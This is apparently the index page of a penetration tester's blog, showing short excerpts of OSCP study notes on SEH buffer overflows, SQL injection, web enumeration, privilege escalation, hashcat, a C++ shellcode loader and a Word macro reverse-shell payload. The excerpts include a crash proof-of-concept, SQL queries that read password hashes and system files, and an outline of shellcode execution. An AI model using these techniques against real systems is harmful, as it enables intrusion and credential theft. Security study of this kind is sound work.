}}
JA Jobyer Ahmed

Blog

  • SEH Stack Buffer Overflow

    After a long time, I am again practicing how to exploit stack based buffer overflow. This post is just a quick note that how to exploit a simple SEH based overflow. The existing exploit can be found at https://www.exploit-db.com/exploits/50471 Application Download Link: https://www.exploit-db.com/apps/762256b7bcc2d7d47a394a52f522b16b-ytgrabber.exe Crash the Application POC Code: buffer = "A"* 9000 createFile = open('testing.txt',"w") createFile.write(buffer) createFile.close() Start Youtube Video Grabber and attach in windbg: Open testing.txt , copy the content, click on Enter code button, and paste into Username and Serial number field:

    Read more →

  • SQL Injection Cheat Sheet

    Enumeration Gather some juicy info to move to higher privileges MySQL Information SQL Query Database Version select @@version Current Database select database() Get other databases name select schema_name from information_schema.schemata Database User select user()select system_user() Database user, password hashes select host, user, password from mysql.user Tables Name select table_schema,table_name from information_schema.tablesselect table_name from information_schema.tables where table_schema='userdb' Columns Name select table_name, column_name **from** information_schema.columns select column_name **from** information_schema.columns where table_name = 'usertable' Read system Files select load_file('/etc/hosts') Write to File select "<?

    Read more →

  • A quick cheat sheet on Python

    This is not a complete python 3 tutorial. This just quick note to remember the python 3 syntax. Python Data Type: Name Type Description Integer int Numbers such as 100,200,1337 Strings str More than one characters such as “Cyber” Booleans bool Logical Value: True or False Floating Point float Numbers with decimal point such as: 1.1 Lists list Sequence of objects: [“Cyber”,10] Dictionaries dict Value pairs: {“key1″:”Cyber”,”key2″:”Red”} Sets set Collection of unique objects: {“test”,”test1″} Tuples tup Ordered secquence of objects: (1,”Cyber”) String Here is the example of String indexing and slicing:

    Read more →

  • Web App Enumeration

    Enumerate using Google Using Google or other search engine we may be able to gather some valuable information. We can search for: Config files SQL File Username, Private keys, even passwords Error messages Any other technical messages Mostly i use following queries: #Find pages site: site.com #Find Subdomain site: site.com -www #Find files php/jsp/aspx/asp/cfm/sql site: site.com filetype:php #Find the page if match keywords in title site: site.com intitle: admin login #if the title match our keyword site: site.

    Read more →

  • Web Pentesting Checklist

    For web pentesting, there are lots to be test. Below I have created a mandatory list what i never miss to test. The Goal? Reverse Shell! Note: This checklist created with help of owasp testing guide and with help of other resource found in the Internet. Recon/Enumeration Discover information using Google, Bing, Shodan, GitHub, Twitter, and LinkedIn Check if robots.txt, crossdomain.xml, clientaccesspolicy.xml, phpinfo.php sitemap.xml exist Identify Web Application Firewall Brute force subdomain DNS Reverse Lookup Brute Foce Files and Directory Analyze SSL Crawl entire site Find Emails, Employees, Phone numbers etc Wayback history Nmap Scan all ports(Including UDP) and do banner grabbing Identify input point Error Handling Request fake pages Try Different HTTP method such as TRACE, OPTIONS, DEBUG, NONE Request multiple parameters with different values(I.

    Read more →

  • Linux Privilege Escalation

    I have written a cheat sheet for windows privilege escalation recently and updating continually. Privilege Escalation is a very important skills in real world pentesting or even for OSCP. So Whatever i have learned during my OSCP Journey, took note. I have organized my notes as a cheat sheet and decided to share publicly, in case it is useful for someone. These technique collected from various source in the Internet, Video and tested in HTB, CyberSecLabs, and in home labs.

    Read more →

  • Windows Privilege Escalation

    In the OSCP exam, Only Gaining access is not enough. Most of the machines may require to escalate to higher privilege. To learn more about windows privilege escalation I have taken a course from Udemy, watching IPSec youtube video, and reading tutorials from various sources. Whatever i have learned, took note. I have organized my notes as a cheat sheet and now it is public. Note: A cheat sheet is not understandable without basic knowledge!

    Read more →

  • Penetration Testing CheatSheet

    While i was Studying for OSCP from various sources. I took note, made a quick cheat sheet, so that i don’t need to search same thing again and again. I am sharing this cheat sheet as i think it might be useful for someone. Enumeration Enumeration is most important part. All finding should be noted for future reference. Without enumeration, we will have hard time to exploit the target. Basic Enumeration Whenever I start pentesting an IP address, My First starting favorite tool is nmap.

    Read more →

  • Bash Script Cheat Sheet

    Hello REDTM #!/usr/bin/bash #This is Comment echo "Hello REDTM" printf "Hello REDTM" Save as hello.sh , give it execute permission chmod +x hello.sh and run ./hello.sh Parameters #!/usr/bin/bash #This is Comment echo -e "Hello $1" printf "Hey, how is it goin $1?" echo "" $1 is the first parameters, second parameters should be $2 and so on. Variables Variables used to store data to use in future by referencing to the variable name!

    Read more →

  • Custom Malware in C++

    This is not a tutorial guide or course. I have wrote this as my note. But you can also utilize my idea if you have basic understanding of C++ and windows API. Understanding 5 WIN API What is the idea to execute our shellcode? Allocate Memory space as RW to store our shellcode Copy our shellcode to that memory Make the memory as executable. Run the payload. Wait to exit VirtualAlloc This function allocate memory space.

    Read more →

  • Hashcat Cheat Sheet

    As a penetration tester we can’t ignore hash cracking if we even can do pass-the-hash. Hash cracking could be one of the last resort if nothing work. Hashcat is the most popular and fastest program to crack password hash. I have included most common technique that can be used in hashcat to crack password hash. Installation apt install cmake build-essential -y apt install checkinstall git -y git clone https://github.com/hashcat/hashcat.git make && make install Performance on nVidia 3080 Ti Performance check for all supported hash:

    Read more →

  • Microsoft Word Macro Payload

    Delivering reverse shell payload via the office macro is old but still works if you can bypass AV. Get your code ready Start Microsoft Office 2016 Pro Plus and Go View Tab and Click Macros>View Macros Give a macro name, Select Macros in Document1 and Click Create Paste the below code and save as Word Macro-Enabled Document or Word 97-2003 Document Sub TestMacro() ' ' TestMacro Macro ' ' cmd = "calc.

    Read more →